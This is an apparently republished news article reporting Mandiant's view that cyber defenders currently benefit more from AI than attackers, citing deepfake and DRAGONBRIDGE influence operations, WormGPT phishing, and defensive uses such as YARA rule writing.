Generative Data Intelligence

Cyber Defenders Lead the AI Arms Race for Now

Date:

Cyber defenders so far are winning the war over artificial intelligence: AI tools have yet to be meaningfully integrated into cyberattacks, while defenders have been using them to greater effect.

In a new report on the state of AI in cybersecurity, Mandiant said while AI has the potential to pose a major threat in the future, that’s not the case for now.

“Attackers are experimenting, and trying to create services around it. But as of right now, we haven’t responded to a single security incident where AI has played even a minor role, as far as we know,” says Sandra Joyce, vice president of Mandiant Intelligence with Google Cloud.

Meanwhile, “we’re actually doing quite a bit to leverage AI tools for defenders. I think we’re at a moment here where this is really an advantage,” she says.

Attackers Use AI for Social Engineering

In just two days at Black Hat 2023, 17 presentations were made about AI or AI-related issues in cyberspace, including the opening keynote of the whole event. Yet most were theoretical, concerning research that’s anticipating rather than reacting to real life developments.

“Ever since 2019, we’ve seen threat actors in multiple countries leveraging GAN [generative adversarial network] images and fake profiles,” Joyce says. Beyond that, AI moving pictures have begun to emerge in recent years. A Belarusian APT experimented with AI-assisted video in June 2021, and after the Russian invasion of Ukraine, miscreants used deepfake software to create a video depicting the surrender of President Volodymyr Zelenskyy.

However, the only threat actor consistently wielding AI today is DRAGONBRIDGE, which maintains vast social media operations in order to spread messaging aligned with the political interests of the People’s Republic of China. This past March, the group used AI-generated imagery to negatively portray US political leaders. In May, it spread fake video news segments with an AI-generated presenter.

“AI tools are primarily being used in these information operations, for social engineering,” Joyce points out. Even the AI malware tools in the wild today are primarily geared towards that end — for example, WormGPT, designed to help malicious actors write more convincing phishing emails.

But even such obvious applications as that haven’t had much positive, practical impact, Joyce says. For example, none of DRAGONBRIDGE’s campaigns have been of much consequence.

How Defenders Are Winning the AI Battle

While hackers take their time warming up to AI tools, cyber defenders have wasted no time at all.

“We’re using it for things like analyzing an alert for a PowerShell script, or writing YARA rules. We’re using it to analyze adversaries, smart contracts — so many applications are making it incredibly useful for defenders right now,” Joyce says.

The challenge for the good guys will be to fully capitalize on their advantage, before the attackers start to catch up.

For example, Joyce says, “people talk about the 750,000 person cyber workforce shortage. And a lot of the time, we’re talking about that from a supply perspective — of how many workers can we train and get out there? But what if we could [create] 10x each worker through AI?”

“How can we better monitor adversary infrastructure? How can we create content faster? How can we look for bad guys and find them sooner? Those are the things that we’re doing on a daily basis. So we’re thrilled to see how AI can help us do that,” she says.

spot_img

Latest Intelligence

spot_img

Chat with us

Hi there! How can I help you?